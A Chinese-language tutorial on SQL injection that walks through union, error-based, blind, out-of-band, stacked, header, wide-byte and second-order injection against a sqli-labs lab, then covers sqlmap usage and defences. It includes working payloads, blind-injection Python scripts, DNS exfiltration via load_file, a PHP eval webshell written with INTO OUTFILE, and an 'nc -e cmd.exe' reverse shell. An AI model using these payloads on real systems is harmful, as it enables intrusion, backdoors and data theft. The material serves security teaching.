Bootstrap

SQL注入知识总结

目录

漏洞原理

漏洞危害

利用方式

手工注入

手工注入步骤-基于联合查询:

1、判断注入类型

2、查询字段数

3、判断回显位

4、查询数据库的基本信息

5、查询数据库中的数据

 报错注入

xpath语法错误

 无回显无报错

1,布尔盲注

2,时间盲注

3,带外注入

4,SQL注入命令执行一

4,SQL注入命令执行二

 堆叠注入

 HTTP头注入

 宽字节注入

 二次注入

自动化注入

SQLMAP

sqlmap特性

输出的内容

设定目标

设定等级

综合利用

1,获取数据库 –dbs

 2,-D指定数据库bwapp --tablase获取数据库中的表

 3,-D指定数据库bwapp -T指定表user --columns获取数据库表中的列

 4,-D指定数据库bwapp -T指定表user -C指定列名,--dump下载

防范方法

SQL注入形成的原因

预处理方式

1,参数化查询

2,存储过程

过滤方式

1,白名单

2,转义


漏洞原理

SQL注入就是指web应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的sql语句来实现对数据库的任意操作。

SQL注入常出现在登录,搜索等功能,凡是与数据库交互的地方都有可能发生SQL注入

漏洞危害

1.绕过登录验证:使用万能密码登录网站后台等。

2.获取敏感数据:获取用户或网站管理员帐号、密码等。

3.文件系统操作:读取、写入文件等。

4.执行系统命令:提权获取远程执行命令。

利用方式

SQL注入根据注入点可以分为数值型注入和字符型注入

根据注入方式可以分为联合查询,报错注入,布尔盲注,时间盲注,二次注入,堆叠注入,宽字节注入和HTTP Header注入

其中HTTP Header注入又分 Referer注入 , Cookie注入 和 User-agent注入

时间盲注又有一种替代方式,叫带外注入。

手工注入

手工注入步骤-基于联合查询:

1、判断注入类型

首先在参数后输入’根据回显,若爆出数据库错误信息,则存在注入点。

 然后,我们需要确定目标是数字型还是字符型注入漏洞,以便我们进一步进行其它注入操作。

 服务器端查询语句为:id为接收参数。

"SELECT * FROM users WHERE id='$id' LIMIT 0,1" 

断是否为字符型:  1' and '1'='1

                                   1' and '1'='2

   判断是否为数值型:1 and 1=1

                                    1 and 1=2

将ID传入可得到一下SQL语句。

"SELECT * FROM users WHERE id=' 1' and '1'='1 ' LIMIT 0,1"

"SELECT * FROM users WHERE id=' 1' and '1'='2 ' LIMIT 0,1"

若第一句正常回显,第二句无回显。则参数id为字符型由’闭合。

数值类型判断同理。

注:此外还可能会有双引号“”,括号()等闭合方式的参数。

And1=1 ,条件为真,查结果无变化。

And1=2 ,条件为假,查询结果为空。

2、查询字段数

由于联合查询需要前后查询的字段数相同,所以在确定注入类型以后,需要确定前面语句查询的字段个数。

在这一步中,我们尝试去猜测出查询语句中的字段个数,如下注入语句所示,

假设为字符型注入,先利用1'实现引号闭环,

再利用order by num -- 去看是否报错来明确查询语句中的字段数,其中 -- 号用于注释掉后方其余sql查询语句。

num为数字列数,依次递增,当num大于实际列数时会报错。

 列数为4时报错,说明实际列数为3列。

3、判断回显位

因为回显只能显示一组数据,所以把参数ID置空,使用union联合查询,判断回显位。

Union select 1,2,3

 回显位为第2,3列。

4、查询数据库的基本信息

将2,3列替换为想要查询的信息。

 可以查询到数据库的基本信息。

拓展一些其它可查询的信息:

                  @@hostname //主机名称

                  @@datadir //返回数据库的存储目录

                  @@version_compile_os //查看服务器的操作系统

                  database() // 查看当前连接的数据库名称

                  user() // 查看当前连接的数据库用户

                  version() //查看数据库版本

                  current_user() // 当前登录的用户和登录的主机名

                  system_user() // 数据库系统用户账户名称和登录的主机名

                  session_user() //当前会话的用户名和登录的主机名

                  @@basedir //MYSQL安装路径

5、查询数据库中的数据

想要查询信息,就必须指定数据库名,表名以及字段名,那么如何才能获取到这些信息呢。

在mysql数据库中

information_schema 数据库是 MySQL 自带的信息数据库。

information_schema 用于存储数据库元数据(关于数据的数据)

例如数据库名、表名、列的数据类型、访问权限等。

information_schema 中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件。

SCHEMATA 表

存储当前mysql实例中所有数据库的信息。

TABLES 表

存储数据库中的表信息(包括视图),包括表属于哪个数据库,表的类型、存储引擎、创建时间等信息。

COLUMNS 表

存储表中的列信息,包括表有多少列、每个列的类型等。

获取当前数据库名:

 获取表名:

group_concat函数首先根据group by指定的列进行分组,

将同一组的列显示出来,并且用分隔符分隔。由函数参数(字段名)决定要返回的列。

根据表名,猜测users表中可能会存储有敏感信息。

选择users表获取表中字段名:

得到数据库名,表名和字段名

尝试查询出users表中username和password字段数据:

 报错注入

联合查询需要页面有回显,当某些不提供回显,只提供SQL报错信息的情况下,联合查询则无法查到想要的数据。

报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。

xpath语法错误

利用xpath语法错误来进行报错注入主要利用extractvalue和updatexml两个函数。需要mysql版本>5.1.5

extractvalue函数:Mysql数据库中的extractvalue函数是用于对XML文档进行查询的函数。

          函数语法:extractvalue(xml_document,Xpath_string)

          参数1表示操作的目标XML文档,参数2则表示目标XML的查找路径。

当Xpath_string不为路径时,则会报出语法错误。

 爆出错误,但是信息不完整,这是需要在开头拼接一个Xpath无法处理的字符,即可显示完整信息。

0x7e是“~”符号的十六进制表现形式,而concat函数的作用就是将“~”符号与select user()

查询的结果进行拼接成字符串,使报错信息中携带完整的查询信息。

后续只需将查询参数依次替换为想要查询的数据即可。

 extractvalue()能查询字符串的最大长度为32,如果我们想要的结果超过32,就要用substring()函数截取或limit分页,一次查看最多32位。

updatexml函数:

          函数语法:updatexml(XML_document , XPath_string , new_value)

          updatexml函数有三个参数,XML_document参数表示目标XML文档(例如doc),

           XPath_string参数表示路径,

          new_value替换查找的数据。

  updatexml函数报错注入的原理和extractvalue函数是相通的。

 无回显无报错

然而很多环境下即无回显也无报错,就需要引入下面的利用方式。

盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。

盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。

用到的函数:

Length()函数 返回字符串的长度

Substr()截取字符串

Ascii()返回字符的ascii码

sleep(n):将程序挂起一段时间 n为n秒

if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句

1,布尔盲注

布尔型:页面只返回True和False两种类型页面。利用页面返回不同,逐个猜解数据

 当and后条件为真时,不影响查询结果,当and后条件为假时,则查询结果为空。

http://192.168.2.9/sqli-labs/Less-8/?id=1'and (length(database()))>10 --+

当前数据库database()的长度大于10,返回正常页面,否则则返回无查询结果页面。

 通过一直改变参数10,根据回显页面特征,可以推断出数据库长度。

通过去数据库名第一位,转换为ascii码,然后重复以上步骤。可以得到数据库名第一位字符对应的ascii码,ascii(substr(database(),1,1))>114

将第二位及以后重复第一位操作,可以获得每一位对应的ascii码。

查找对应的ascii码表即可得到完整的数据库名。

由于盲注过程非常繁琐,所以需要借助脚本实现。

ASCII码表中前32个和最后1个为控制字符,

所以在编写脚本时,应考虑从32位取至126位即可。

 获取数据库名长度:

import requests

def database_len():
    i=1
    while True:
        url="http://192.168.2.9/sqli-labs/Less-8/?id=1'and (length(database()))=%d --+"%(i)
        r=requests.get(url)
        if 'You are in...........' in r.text:
            return i
            break
        i=i+1

if __name__=='__main__':
    print("数据库名长度位:%d"%(database_len()))

2,时间盲注

时间盲注又称延迟注入,适用于页面不会返回错误信息,且只会回显一种界面,其主要特征是

利用sleep函数,制造时间延迟,由回显时间来判断构造的条件是否正确。

时间忙著与布尔盲注类似,布尔盲注基于两种回显页面,而时间忙著基于请求所用的时间。其

有着一定的区别。

http://192.168.2.9/sqli-labs/Less-9/?id=1' and if(length(database())>5,sleep(5),0) --+

 获取数据库名长度:

import requests
import time
def get_length_of_database():
    i=1
    while True:
        url="http://192.168.2.9/sqli-labs/Less-9/?id=1' and length(database())=%d and sleep(2) --+"%(i)
        startTime=time.time()
        rsq=requests.get(url)
        endTime=time.time()
        a=endTime-startTime
        if a>2:
            return i
        i=i+1

if __name__=='__main__':
    print("数据库名长度为%d"%(get_length_of_database()))

3,带外注入

带外通道技术(OOB)让攻击者能够通过另一种方式来确认和利用没有直接回显的漏洞。

这一类漏洞中,攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果。

带外通道技术通常需要利用漏洞来生成带外的TCP/UDP/ICMP请求,然后,攻击者可以通过这个请求来提取数据。

UNC路径

UNC(Universal Naming Convention)/通用命名规则。

Windows主机默认存在,Linux主机默认不存在。格式:

\\servername\sharename,其中servername是服务器名。sharename是共享资源的名称。

当使用UNC路径时,会对域名进行DNS查询。

DNS查询

DNS是域名解析系统,它的功能是将站点的域名转换为站点的IP地址。DNS查询方式为递归查询。

泛域名解析

泛域名解析就是利用通配符的方式将所有的次级域名指向同一IP。

www.example.com和abc.example.com都会访问到同一个站点。

结合UNC路径

\\www.example.com\text.txt

MySQL读写文件

Load_file()函数是MySQL中一个常用的函数,主要用来读取文件内容。

函数原型:load_file(file_path)

该函数会读取文件内容,并将文件内容作为字符串返回。如果读取失败会返回NULL

该函数在执行过程中需要遵循secure_file_priv的限制。

可在MySQL配置文件my.ini中进行修改,在[mysqld]下面插入一行。

secure_file_priv:

值为NULL表示禁止限制操作

值为某一目录,则只能操作该目录下的文件

没有值则表示不对读写文件进行限制:secure_file_priv=

Mysql中查看:show global variables like "secure%";

读文件结合UNC路径可以实现将查询到的值拼接上一个泛域名解析地址,然后对其访问,

将查询的数据通过域名带出。

select load_file(concat("\\\\",(database()),".qguagy.dnslog.cn\\1"));

4,SQL注入命令执行一

通过SQL注入,直接写入webshell文件到服务器,通过GET方法或POST方法提交并执行外部指令,

为后续进一步远程控制,提权创造条件。

select '<?php @eval($_POST[a]) ?>' into outfile'E:\\apache24\\htdocs\\uploads\\sql.php';

 

通过一句话木马反弹shell

  建立监听:nc -lvvp 6666

通过webshell传入命令:a=system("nc -e cmd.exe 192.168.2.5 6666");

即可成功反弹shell。

4,SQL注入命令执行二

还可以利用“用户自定义函数”的方式,即User-Defined-Functions(UDF)来执行命令。

通过lib_mysqludf_sys提供的函数可以执行系统命令。

获取UDF文件

1,SQLmap集成UDF库文件:https://github.com/sqlmapproject/sqlmap/tree/master/data/udf

2,https://github.com/mysqludf/lib_mysqludf_sys

注:SQLmap下文件是经过编码的,需要通过sqlmap/extra/cloak目录下的cloak.py进行解码

先将文件转为16进制,然后使用下面语句写入。

select unhex('') into dumpfile 'E:\mysql\lib\plugin\win32_udf.dll'



Dumpfile v.s. outfile

若把一个可执行二进制文件用into outfile函数导出,导出后文件会被破坏。

因为into outfile函数会在行末端写入新行,更致命的是会转义换行符,这样

的话这个二进制文件就会被破坏。

这时候我们用into dumpfile 就能导出一个完整能执行的二进制文件,

Into dumpfile 函数不对任何列或行进行终止,也不执行任何转义处理。

创建函数:create function sys_eval returns string soname “lib_mysqludf_sys.dll”;

 调用创建的函数,即可执行系统命令。

 堆叠注入

在;结束一个SQL语句后继续构造下一条语句,使多条语句顺序执行,这就是堆叠注入。

对比union或者union all,联合查询执行的语句类型使有限的,只可以用来执行查询语句,

而堆叠注入可以执行任意的语句,威力巨大!

PHP-MySQL相关API:mysqli_multi_query

执行payload:

http://192.168.2.9/sqli-labs/Less-38/?id=1';

create database ma123 default charset utf8; --+

成功创建数据库。

 HTTP头注入

HTTP头注入:

针对HTTP的请求头,如果不加以过滤或转义,在直接与数据库交互的过程中容易被利用进行SQL注入攻击。

使用场景:访问Web Server时,Web Server会从HTTP Header中驱逐浏览器信息、IP地址、

HOST信息等存储在数据库中。

HTTP Header注入又分 Referer注入 , Cookie注入 和 User-agent注入

通过burp抓包修改对应的参数:

User-Agent: ',1,updatexml(1,concat(0x7e, database(),0x7e),1))#

 宽字节注入

开发人员对为了防止注入会选择转义掉’字符,使其失去控制效果。

GBK 占用两字节,ASCII占用一字节,PHP中编码为GBK,PHP中addslashes函数执行添加的是

ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。

在注入点输入(')会被转义为(\')编码后为(%5c%27), GBK编码表,%DF%5C正好组成( 運),

所以会把\"吃掉",0X81-0XFE都可以

 在’前加入%df即可完成宽字节注入,使转义字符失去作用。

 

 二次注入

二次注入是指在执行某些语句是有些参数是取自数据库,二次注入发生的主要原因是来自数据库

的内容也是不可靠的。

当注册账号为:admin’#。

如果前端做了转义处理,在接收到数据时为:admin\’#,前端不会产生SQL注入。

但是在数据存储入数据库内时其内容为:admin’#。

当需要再次调用此数据时,来自数据库的账号数据为admin’#,如果未对后端的数据进行处理

那么同样会产生SQL注入。

例如该用户修改密码的情况下,更新语句条件会变为:where user=‘admin’#’and password=‘123’

可以在不知道用户admin密码的情况下,更新其密码。

自动化注入

SQLMAP

一款功能强大集成了多种数据库识别及注入方式,多用于识别和利用Web应用程序注入漏洞的工具。

优点在于集成了大量payload,对检查与利用的自动化处理(数据库

指纹、访问底层文件系统、执行命令)。

Payload原理与前面SQL注入相似,利用数据库执行非预期的语句,但

更加复杂,有专门研究数据库的人编写。Kali内置,其他平台需自行安装。

官方网站:https://sqlmap.org/

sqlmap特性

对直连数据库的支持:

  不需要通过SQL注入,只需要提供DBMS的账户信息、IP地址、端口及数据库名称。

对枚举功能的支持:

  包括用户、密码HASH、权限、角色、数据库、数据表、数据列。

密码HASH相关支持:

  自动识别HASH格式以及自动实施基于字典的破解攻击。

对DUMP数据的功能支持:

  可以根据用户选择进行全部导出/部分导出。

对搜索功能的强大支持:

  该功能非常实用,可用于搜索特定数据库名、所有数据库中的特定名称数据表、所有

  数据表中特定名称的数据列。

对下载/上传文件的支持:

  优先支持的DBMS包括MySQL、PostgreSQL、MS SQL Server。

对命令执行的支持:

  优先支持的DBMS包括MySQL、PostgreSQL、MS SQL Server。

对建立一个基于OOB的TCP连接的支持:

  连接的Channel支持交互式命令行、Meterpreter session以及VNC session。

对数据库提权的支持:

  该支持通过msf中meterpreter的getsystem命令。

输出的内容

选项 –v

  0:只显示python的error和critical级别的信息。

  1:显示information和warning级别的信息。

  2:显示debug级别的信息。

  3:额外显示注入的payload(很有用,测试过程的记录)。

  4:额外显示HTTP请求头内容。

  5:额外显示HTTP响应头。

  6:额外显示HTTP相应页面内容。

设定目标

选项 -u 或 --url

  选定一个url目标,并执行SQL注入攻击。

  sqlmap –u “http://www.xxx.com/index.php?id=1” -f --banner --dbs --users

选项 -d 或 --data

 

  默认的HTTP请求发送方式时GET,可以通过该选项指定为POST

  sqlmap –u “http://www.xxx.com/index.php” --data=“id=1” -f --banner --dbs --users

携带cookie

选项 --cookie ,--load-cookies

  设定Cookie流程:

  1,通过浏览器登录Web App;

  2,从Burp Suite 或浏览器内部取得Cookie;

  3,通过-cookie选项设置取得的Cookie;

说明:在sqlmap执行注入攻击的过程中,如果服务器返回了Set-Cookie的headers,那么sqlmap会自动识别这一指令,并更新对应的Cookie,如果我们已经通过-cookie设定了Cookie的数值,那么sqlmap会像向我们确认是否进行更新。

例:

sqlmap -u "http://192.168.2.7/bWAPP/sqli_1.php?title=1&action=search" –cookie=
"PHPSESSID=7hssotaep8iaklsbbbr2eth6i0; acopendivids=swingset,jotto,phpbb2,redmine;
 acgroupswithpersist=nada; security_level=0" -f --banner --dbs --users

设定等级

--risk=1-3 –level=1-5

  默认都是1,

  level级别提升,会加入更多的测试,2会加入cookie的测试,3会加入Useragent头的注入测试

  5进行host测试。

  sql-master/data/xml/payload目录下有payload

  内容risk级别提升会加入or和update可能对数据表内容进行修改。(谨慎使用)。 

  如果为指定参数,并且risk1 level1会直接退出。

读写文件

--file-read --file-write --file-dest

  读文件:--file-read“path”

  写文件:--file-write“local-path” --file-dest“server-path”

命令执行

--os-cmd ---shell

  需要具有文件夹写权限。

综合利用

1,获取数据库 –dbs

 2,-D指定数据库bwapp --tablase获取数据库中的表

 3,-D指定数据库bwapp -T指定表user --columns获取数据库表中的列

 4,-D指定数据库bwapp -T指定表user -C指定列名,--dump下载

防范方法

SQL注入形成的原因

1,用户能够控制传参

2,SQL语句中拼接了用户传参的内容

3,拼接后的SQL语句在数据库中执行

其实就是用户输入的数据被作为代码执行了!

预处理方式

1,参数化查询

参数化查询是指在设计与数据库连接并访问时,在需要填入数值或数据的地方使用参数。

Prepare  命令会带着占位符被数据库进行编译和解析,并放到命令缓冲区

Execute  带着参数调用预编译的命令并解析,但是不会重新编译命令

2,存储过程

存储过程是指数据库中存放了一组为完成特定功能生成的SQL语句,这些语句一次编译后永久有效,用户通过指定存储过程的名字并给出参数来执行这些语句。

存储过程的SQL语句存放在数据库中,用户通过调用这些过程获取数据,参数化查询的SQL语句是通过Web应用完成执行。

存储过程被创建后存放在表mysql.proc中。

过滤方式

1,白名单

只接受来自白名单中规定的内容,白名单之外的内容直接丢弃,

这种方法适合于传参内容可以穷举,且不频繁变化的场景。

2,转义

对用户输入的特殊字符进行转义,这些字符可能会影响SQL代码的执行。

转换为布尔值

  对于某些简单的操作,比如排序。可以将用户的传参转换为布尔值,而不是直接使用

  用户的传参。

转十六进制比较

  hex(id)=hex(“用户输入”)

;